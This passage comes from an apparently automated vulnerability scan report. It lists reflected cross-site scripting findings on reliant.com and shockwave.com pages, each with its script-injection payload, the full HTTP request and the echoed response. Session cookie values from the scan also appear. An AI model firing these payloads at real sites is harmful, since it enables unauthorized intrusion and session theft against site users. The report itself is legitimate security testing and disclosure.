Cookie: i_chronicle_id=090175228036e945; UserSessionFilterCookieID=730AC166-140D-01EA-2789-A816B0F33610; JSESSIONID=F3E703A189A9026310F9CC3DA2E5179F; language_code=en_US; site_location=Shop; CurrentAccountSegment=Generic; mbox=check#true#1300630048|session#1300629987035-862457#1300631848; s_cc=true; s_nr=1300629988527-New; s_evar17=9%3A00AM; s_evar18=Sunday; s_evar19=Weekend; c=undefinedburpburp; s_evar37cvp=%5B%5B'Other%20Referrers'%2C'1300629988532'%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 20 Mar 2011 14:07:01 GMT
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-cookie: language_code=en_US; Domain=.reliant.com; Path=/
Set-cookie: i_chronicle_id=090175228036e945
Set-cookie: site_location=Shop; Domain=.reliant.com; Path=/
Set-cookie: CurrentAccountSegment=Generic; Domain=.reliant.com; Path=/
Content-type: text/html;charset=utf-8
Via: 1.1 https-www.reliant.com
Proxy-agent: Oracle-iPlanet-Web-Server/7.0
Content-Length: 80822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
...[SNIP]...
// Get key navigation values
var SUB_NAV_ROOT_ID = '';
var SUB_NAV_ROOT_NAME = '';
var SUB_NAV_ID = '';
var LANGUAGE_CODE = COOKIE_SET['language_code'];
var MSG_CODE='|browser_supporte8613';alert(1)//5c7352ce38c';
-->
...[SNIP]...

1.221. http://www.reliant.com/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reliant.com
Path:	/en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc968'-alert(1)-'fdd40018f76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en_US/Page/Shop/Public/misc_LockedandLow_100_landingpage.jsp?bc968'-alert(1)-'fdd40018f76=1 HTTP/1.1
Host: www.reliant.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 20 Mar 2011 14:00:18 GMT
Content-type: text/html;charset=utf-8
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-cookie: UserSessionFilterCookieID=034963EA-6D06-813D-075B-8E82E4044CB2; Expires=Mon, 19-Mar-2012 14:00:18 GMT; Path=/
Set-cookie: JSESSIONID=1B8C124B67648A1F1E86C49895CBE245; Path=/
Set-cookie: language_code=en_US; Domain=.reliant.com; Path=/
Set-cookie: i_chronicle_id=090175228036daba
Set-cookie: site_location=Shop; Domain=.reliant.com; Path=/
Set-cookie: CurrentAccountSegment=Generic; Domain=.reliant.com; Path=/
Pragma: no-cache
Via: 1.1 https-www.reliant.com
Proxy-agent: Oracle-iPlanet-Web-Server/7.0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
...[SNIP]...
Key ;
}

function checkProtocol() {
var aForm = window.document.forms[0]
var protocol = "http"
if (protocol == "http" || protocol == "HTTP") {
aForm.action = 'http://nullnull?bc968'-alert(1)-'fdd40018f76=1'
aForm.submit();
}
}
function addleadingZero(str)
       {
            var numbr ="";
            if (str.length < 2 ) {
               numbr = "0" + str
            } else {
               numbr = str;
            }

...[SNIP]...

1.222. http://www.shockwave.com/activityFeed/getHappeningNowMessages.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/activityFeed/getHappeningNowMessages.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96e0"><script>alert(1)</script>6a5d35da825 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /activityFeedd96e0"><script>alert(1)</script>6a5d35da825/getHappeningNowMessages.jsp HTTP/1.1
Host: www.shockwave.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
Origin: http://www.shockwave.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; mbox=check#true#1300624515|session#1300624454318-408793#1300626315; s_pn=%2Fhome.jsp; s_nr=1300624454448; s_cc=true; __qca=P0-668179243-1300624455024; mtvn_guid=1299937743-92; __cs_rr=1; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153495162.870092848.1300624455.1300624455.1300624455.1; __utmc=153495162; __utmb=153495162.1.10.1300624455; s_ppv=31; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA
Content-Length: 0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 13:02:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:02:50 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/activityFeedd96e0"><script>alert(1)</script>6a5d35da825/getHappeningNowMessages.jsp" />
...[SNIP]...

1.223. http://www.shockwave.com/activityFeed/getHappeningNowMessages.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/activityFeed/getHappeningNowMessages.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd54"><script>alert(1)</script>892db222e41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /activityFeed/getHappeningNowMessages.jsp9dd54"><script>alert(1)</script>892db222e41 HTTP/1.1
Host: www.shockwave.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
Origin: http://www.shockwave.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; mbox=check#true#1300624515|session#1300624454318-408793#1300626315; s_pn=%2Fhome.jsp; s_nr=1300624454448; s_cc=true; __qca=P0-668179243-1300624455024; mtvn_guid=1299937743-92; __cs_rr=1; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153495162.870092848.1300624455.1300624455.1300624455.1; __utmc=153495162; __utmb=153495162.1.10.1300624455; s_ppv=31; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA
Content-Length: 0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 13:02:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:02:57 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/activityFeed/getHappeningNowMessages.jsp9dd54"><script>alert(1)</script>892db222e41" />
...[SNIP]...

1.224. http://www.shockwave.com/ajax/modalLogin.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/ajax/modalLogin.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb60e"><script>alert(1)</script>38583882662 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ajaxeb60e"><script>alert(1)</script>38583882662/modalLogin.jsp HTTP/1.1
Host: www.shockwave.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
Origin: http://www.shockwave.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __qca=P0-668179243-1300624455024; mtvn_guid=1299937743-92; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_nr=1300624572007; s_cc=true; __cs_rr=1; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; __utmc=153495162; s_ppv=57; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA
Content-Length: 0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 13:39:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:39:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 36090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/ajaxeb60e"><script>alert(1)</script>38583882662/modalLogin.jsp" />
...[SNIP]...

1.225. http://www.shockwave.com/forgotPassword.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/forgotPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0144"><script>alert(1)</script>c8f8e26eb0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgotPassword.jspb0144"><script>alert(1)</script>c8f8e26eb0b HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/forgotPassword.jspb0144"><script>alert(1)</script>c8f8e26eb0b" />
...[SNIP]...

1.226. http://www.shockwave.com/gamelanding/wordrounduphollywood.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/gamelanding/wordrounduphollywood.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 760b5"><script>alert(1)</script>4b5cc529c11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gamelanding760b5"><script>alert(1)</script>4b5cc529c11/wordrounduphollywood.jsp HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/gamelanding760b5"><script>alert(1)</script>4b5cc529c11/wordrounduphollywood.jsp" />
...[SNIP]...

1.227. http://www.shockwave.com/gamelanding/wordrounduphollywood.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/gamelanding/wordrounduphollywood.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86305"><script>alert(1)</script>7c1a8eae9f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gamelanding/wordrounduphollywood.jsp86305"><script>alert(1)</script>7c1a8eae9f3 HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/gamelanding/wordrounduphollywood.jsp86305"><script>alert(1)</script>7c1a8eae9f3" />
...[SNIP]...

1.228. http://www.shockwave.com/games/pod.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/games/pod.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eeb6"><script>alert(1)</script>99773c0415d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games9eeb6"><script>alert(1)</script>99773c0415d/pod.jsp HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/games9eeb6"><script>alert(1)</script>99773c0415d/pod.jsp" />
...[SNIP]...

1.229. http://www.shockwave.com/games/pod.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/games/pod.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c8c"><script>alert(1)</script>d92bf04e0f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /games/pod.jsp80c8c"><script>alert(1)</script>d92bf04e0f0 HTTP/1.1
Host: www.shockwave.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; __utmz=153495162.1300624455.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pn=%2Fmember%2FavatarViewer.jsp48e63%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eecdcc990455; s_sq=viashockwave%3D%2526pid%253D%25252Fhome.jsp%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.shockwave.com%25252Fhome.jsp%252523%2526ot%253DA; s_ppv=57; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D1607%253Bdemo%253D1306%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D847%253Bdemo%253D844%253Bdemo%253D792%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1300624454318-408793#1300626432|check#true#1300624632; s_cc=true; __cs_rr=1; s_nr=1300624572007; __utma=153495162.870092848.1300624455.1300624455.1300624455.1; mtvn_guid=1299937743-92; __utmc=153495162; __utmb=153495162.2.10.1300624455; __qca=P0-668179243-1300624455024;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 14:00:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:00:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/games/pod.jsp80c8c"><script>alert(1)</script>d92bf04e0f0" />
...[SNIP]...

1.230. http://www.shockwave.com/home.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/home.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ab7"><script>alert(1)</script>07e9f99b905 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home.jsp52ab7"><script>alert(1)</script>07e9f99b905 HTTP/1.1
Host: www.shockwave.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.7a Resin/3.1.2
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Sun, 20 Mar 2011 12:34:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:34:38 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=aceS95mCkK9PO7hbPqt7s; domain=.shockwave.com; path=/
Content-Length: 36068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<link rel="canonical" href="http://www.shockwave.com/home.jsp52ab7"><script>alert(1)</script>07e9f99b905" />
...[SNIP]...

1.231. http://www.shockwave.com/member/avatarViewer.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.shockwave.com
Path:	/member/avatarViewer.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7646f"><script>alert(1)</script>e4c58fa6589 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /member7646f"><script>alert(1)</script>e4c58fa6589/avatarViewer.jsp?p=1&size=small&screenname=cbardezbain&mid=251037782 HTTP/1.1
Host: www.shockwave.com
Proxy-Connection: keep-alive
Referer: http://www.shockwave.com/home.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=adbHr0Y82SFkD9VaJqt7s; mbox=check#true#1300624515|session#1300624454318-408793#1300626315; s_pn=%2Fhome.jsp; s_ppv=0; s_nr=1300624454448; s_cc=true; s_sq=%5B%5BB%5D%5D

